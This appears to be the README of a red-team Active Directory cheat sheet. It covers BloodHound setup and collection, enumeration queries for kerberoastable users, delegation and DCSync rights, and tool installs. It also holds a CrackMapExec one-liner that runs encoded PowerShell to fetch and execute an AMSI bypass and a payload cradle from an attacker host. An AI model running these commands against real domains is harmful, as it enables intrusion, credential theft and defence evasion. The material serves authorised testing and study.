Skip to content

Latest commit

 

History

History

ad

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
ad-cs-abuse
ad-cs-abuse
 
 
av-edr-evasion
av-edr-evasion
 
 
credentials-dump
credentials-dump
 
 
delegation-abuse
delegation-abuse
 
 
kerberos
kerberos
 
 
lateral-movement
lateral-movement
 
 
ntlm
ntlm
 
 
privileges-abuse
privileges-abuse
 
 
README.md
README.md
 
 
acl-abuse.md
acl-abuse.md
 
 
adidns-abuse.md
adidns-abuse.md
 
 
attack-trusts.md
attack-trusts.md
 
 
authentication-coercion.md
authentication-coercion.md
 
 
azure.md
azure.md
 
 
dcsync.md
dcsync.md
 
 
discovery.md
discovery.md
 
 
dnsadmins.md
dnsadmins.md
 
 
dominance.md
dominance.md
 
 
gpo-abuse.md
gpo-abuse.md
 
 
key-credentials-abuse.md
key-credentials-abuse.md
 
 
laps.md
laps.md
 
 
ldap-ldaps.md
ldap-ldaps.md
 
 
password-spraying.md
password-spraying.md
 
 
post-exploitation.md
post-exploitation.md
 
 
privexchange.md
privexchange.md
 
 
rid-cycling.md
rid-cycling.md
 
 
roasting.md
roasting.md
 
 
rpc.md
rpc.md
 
 
sccm-abuse.md
sccm-abuse.md
 
 
smb.md
smb.md
 
 
spn-jacking.md
spn-jacking.md
 
 
token-manipulation.md
token-manipulation.md
 
 
user-hunt.md
user-hunt.md
 
 
wsus.md
wsus.md
 
 
zerologon.md
zerologon.md
 
 

README.md

AD

{% embed url="https://youtu.be/5VW_eQD1-eA" %}

{% embed url="https://youtu.be/ReHn7c8qlIo" %}

Pentesting AD Mindmap

AD Labs

Capsulecorp

Game Of Active Directory

Microsoft Wont-Fix-List

Tools

BloodHound

Setup

curl -sSL https://api.github.com/repos/BloodHoundAD/BloodHound/releases/latest | jq -r '.assets[].browser_download_url' | grep 'BloodHound-linux-x64.zip' | wget -O 'BloodHound.zip' -i -
unzip BloodHound.zip && rm BloodHound.zip
mv BloodHound-linux-x64 BloodHound && cd BloodHound
sudo chown root:root chrome-sandbox
sudo chmod 4755 chrome-sandbox
chmod +x BloodHound
sudo mkdir /usr/share/neo4j/logs/

mkdir -p ~/.config/bloodhound
curl -sSL https://github.com/ShutdownRepo/Exegol-images/raw/main/sources/bloodhound/customqueries.json > /tmp/customqueries1.json
curl -sSL https://github.com/CompassSecurity/BloodHoundQueries/raw/master/customqueries.json > /tmp/customqueries2.json
curl -sSL https://github.com/ZephrFish/Bloodhound-CustomQueries/raw/main/customqueries.json > /tmp/customqueries3.json
curl -sSL https://github.com/ly4k/Certipy/raw/main/customqueries.json > /tmp/customqueries4.json

python3 - << 'EOT'
import json
from pathlib import Path

merged, dups = {'queries': []}, set()
for jf in sorted((Path('/tmp')).glob('customqueries*.json')):
	with open(jf, 'r') as f:
		for query in json.load(f)['queries']:
			if 'queryList' in query.keys():
				qt = tuple(q['query'] for q in query['queryList'])
				if qt not in dups:
					merged['queries'].append(query)
					dups.add(qt)

with open(Path.home() / '.config' / 'bloodhound' / 'customqueries.json', 'w') as f:
	json.dump(merged, f, indent=4)

EOT

rm /tmp/customqueries*.json
curl -sSL "https://github.com/ShutdownRepo/Exegol-images/raw/main/sources/bloodhound/config.json" > ~/.config/bloodhound/config.json
sed -i 's/"password": "exegol4thewin"/"password": "WeaponizeK4li!"/g' ~/.config/bloodhound/config.json

Collectors

SharpHound.exe

SharpHound cheatsheet (by @SadProcessor)

PS > .\SharpHound.exe [-d megacorp.local] [--LdapUsername snovvcrash] [--LdapPassword 'Passw0rd!'] -c All,GPOLocalGroup [--Stealth] --CollectAllProperties --OutputDirectory C:\Windows\Temp --MemCache --ZipFileName backup_full.zip [--RandomFilenames] [--Throttle 100] [--Jitter 20]
PS > .\SharpHound.exe -c SessionLoop --Loop --LoopInterval 00:01:00 --Loopduration 03:09:41
SharpHound.ps1
PS > Invoke-Bloodhound [-Domain megacorp.local] [-LdapUsername snovvcrash] [-LdapPassword 'Passw0rd!'] -CollectionMethod All,GPOLocalGroup [-Stealth] -CollectAllProperties -OutputDirectory C:\Windows\Temp -NoSaveCache -RandomizeFilenames -ZipFileName backup_full.zip [-Throttle 100] [-Jitter 20]
PS > Invoke-Bloodhound -CollectionMethod SessionLoop -Loop -LoopInterval 00:01:00 -Loopduration 03:09:41
BloodHound.py
$ cd ~/ws/enum/bloodhound/bloodhound.py/
$ bloodhound-python -c All,LoggedOn --zip -u snovvcrash -p 'Passw0rd!' -d megacorp.local -ns 192.168.1.11
$ proxychains4 -q bloodhound-python -c All,LoggedOn --zip -u snovvcrash --hashes aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -d megacorp.local -ns 192.168.1.11 -dc DC01.megacorp.local -gc DC01.megacorp.local --dns-tcp

Import with bloodhound-import:

$ bloodhound-import -du neo4j -dp 'Passw0rd!' 20190115133114*.json
ADExplorerSnapshot.py

Cypher (Neo4j)

Show percentage of collected user sessions:

{% embed url="https://youtu.be/q86VgM2Tafc?t=353" %}

# http://localhost:7474/browser/
MATCH (u1:User)
WITH COUNT(u1) AS totalUsers
MATCH (c:Computer)-[r:HasSession]->(u2:User)
WITH totalUsers, COUNT(DISTINCT(u2)) AS usersWithSessions
RETURN totalUsers, usersWithSessions, 100 * usersWithSessions / totalUsers AS percetange

Show path to any computer from kerberoastable users:

MATCH (u:User {hasspn:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p

Manual JSON Parsing

{% embed url="https://youtu.be/o3W4H0UfDmQ" %}

There're 2 global dicts in JSON files: data and meta. We care about data:

$ cat 20220604031239_users.json | jq '. | keys'
[
  "data",
  "meta"
]

List all active user accounts:

cat 20220604031239_users.json | jq '.data[].Properties | select(.enabled == true) | .name' -r

List non-empty user accounts' descriptions:

cat 20220604031239_users.json | jq '.data[].Properties | select(.enabled == true and .description != null) | .name + " :: " + .description' -r

List user accounts whose passwords were set after their last logon (an effective list for password spraying assuming that the passwords were set by IT Desk and may be guessable):

cat 20220604031239_users.json | jq '.data[].Properties | select(.enabled == true and .pwdlastset > .lastlogontimestamp) | .name + " :: " + (.lastlogontimestamp | tostring)' -r

List user accounts with DoesNotRequirePreAuth set (aka asreproastable):

cat 20220604031239_users.json | jq '.data[].Properties | select(.enabled == true and .dontreqpreauth == true) | .name' -r

List user accounts with SPN(s) set (aka kerberoastable)

cat 20220604031239_users.json | jq '.data[].Properties | select(.enabled == true and .serviceprincipalnames != []) | .name + " :: " + (.serviceprincipalnames | join(","))' -r

List computer accounts' operating system names:

cat 20220604031239_computers.json | jq '.data[].Properties | .name + " :: " + .operatingsystem' -r

Recursively list all members of a group (mimics RSAT Get-ADGroupMember, script):

$ ls
20220604043009_computers.json  20220604043009_groups.json  20220604043009_users.json
$ python3 get_ad_group_member.py 'DOMAIN [email protected]'

Recursively list all groups which the user is a member of (mimics RSAT Get-ADUser | select memberof, script):

$ ls
20220604043009_groups.json  20220604043009_users.json
$ python3 get_ad_user_memberof.py '[email protected]'

Generate a .csv file containing AD trusts mapping to be used in TrustVisualizer (mimics PowerView Get-DomainTrustMapping, script):

$ ls
20220604043009_domains.json
$ python3 get_domain_trust_mapping.py

PowerView / SharpView

Example Queries

Users

Convert SID to name and vice versa:

PV3 > ConvertTo-SID <NAME>
PV3 > Convert-NameToSid <NAME>
PV3 > ConvertFrom-SID <SID>
PV3 > Convert-SidToName <SID>

Extract all domain user accounts into a .csv file:

PV3 > Get-DomainUser -Domain megacorp.local | select name,samAccountName,description,memberOf,whenCreated,pwdLastSet,lastLogonTimestamp,accountExpires,adminCount,userPrincipalName,servicePrincipalName,mail,userAccountControl | Export-Csv .\all-users.csv -NoTypeInformation

List domain user accounts that do not require Kerberos pre-authentication (see ASREPRoasting):

PS > .\SharpView.exe Get-DomainUser -KerberosPreauthNotRequired -Properties samAccountName,userAccountControl,memberOf

List domain user accounts with Service Principal Names (SPNs) set (see Kerberoasting):

PS > .\SharpView.exe Get-DomainUser -SPN -Properties samAccountName,memberOf,servicePrincipalName

List domain user accounts with Kerberos unconstrained delegation enabled:

PS > .\SharpView.exe Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)"

List domain user accounts with Kerberos constrained delegation enabled:

PS > .\SharpView.exe Get-DomainUser -TrustedToAuth -Properties samAccountName,userAccountControl,memberOf

Search for domain user accounts which may have sensitive stored in the description field:

PV3 > Get-DomainUser -Properties samaccountname,description | Where {$_.description -ne $null}

Search for domain user by email:

PV3 > Get-DomainUser -LDAPFilter '([email protected])' -Properties samaccountname

Find users with DCSync right:

PV3 > $dcsync = Get-DomainObjectACL "DC=megacorp,DC=local" -ResolveGUIDs | ? {$_.ActiveDirectoryRights -match "GenericAll" -or $_.ObjectAceType -match "Replication-Get"} | select -ExpandProperty SecurityIdentifier | select -ExpandProperty value
PV3 > Convert-SidToName $dcsync
Groups

Enumerate domain computers where specific users (Identity) are members of a specific local group (LocalGroup):

PV3 > Get-DomainGPOUserLocalGroupMapping -Identity snovvcrash -LocalGroup Administrators
Computers

Extract all domain computer accounts into a .csv file:

PV3 > Get-DomainComputer -Properties dnsHostName,operatingSystem,lastLogonTimestamp,userAccountControl | Export-Csv .\all-computers.csv -NoTypeInformation

List domain computer accounts that allow Kerberos unconstrained delegation:

PS > .\SharpView.exe Get-DomainComputer -Unconstrained -Properties dnsHostName,userAccountControl

Resolve all domain computer IPs by their names:

PV3 > Get-DomainComputer -Properties name | Resolve-IPAddress

List domain computers that are part of a OU:

PV3 > Get-DomainComputer | ? { $_.DistinguishedName -match "OU=<OU_NAME>" } | select dnsHostName
Shares

List shares for WS01 computer:

PS > .\SharpView.exe Get-NetShare -ComputerName WS01
GPOs

List all domain users with a 4-digit RID (eliminates default objects like 516, 519, etc.) who can edit GPOs:

PV3 > Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|WriteDacl|WriteOwner" -and $_.SecurityIdentifier -match "<SID>-[\d]{4,10}" } | select objectDN, activeDirectoryRights, securityIdentifier | fl

Resolve GPO ObjectDN:

PV3 > Get-DomainGPO -Name "<DN>" -Properties DisplayName

Impacket

Install:

$ git clone https://github.com/SecureAuthCorp/impacket ~/tools/impacket && cd ~/tools/impacket
$ pip3 install .
Or
$ pipx install -f "git+https://github.com/SecureAuthCorp/impacket.git"

CrackMapExec (CME)

Install:

$ pipx install -f "git+https://github.com/Porchetta-Industries/CrackMapExec.git"
$ cme -h

Install for debugging and developement:

$ git clone --recursive https://github.com/Porchetta-Industries/CrackMapExec ~/tools/CrackMapExec && cd ~/tools/CrackMapExec
$ poetry install
$ poetry run crackmapexec -h

Execute a PowerShell command using base64 encoding on-the-fly:

$ cme smb 192.168.1.11 -u snovvcrash -p 'Passw0rd!' -x "powershell -enc `echo -n 'iex(new-object net.webclient).downloadstring("http://10.10.13.37/amsi.ps1");iex(new-object net.webclient).downloadstring("http://10.10.13.37/cradle.ps1")' | iconv -t UTF-16LE | base64 -w0`"

Mitigations

Common vulnerabilities & misconfigurations and recommendations:

SMB lateral-movement hardening:

{% file src="/.gitbook/assets/SMB Enumeration-Exploitation-Hardening (Anil BAS).pdf" %}

Antispam protection for Exchange:

{% file src="/.gitbook/assets/Antispam Forefront Protection 2010 (Exchange Server).pdf" %}

Detect stale, unused or fake computer accounts based on password age (replace -90 with your domain's maximum computer account password age):

$date = [DateTime]::Today.AddDays(-90); Get-ADComputer -Filter '(Enabled -eq $true) -and (PasswordLastSet -le $date)' | select Name

Administrative Tier Model & Microsoft RaMP (Zero Trust Rapid Modernization Plan):

Post compromise AD actions (checklist):

Hardening automatization tool: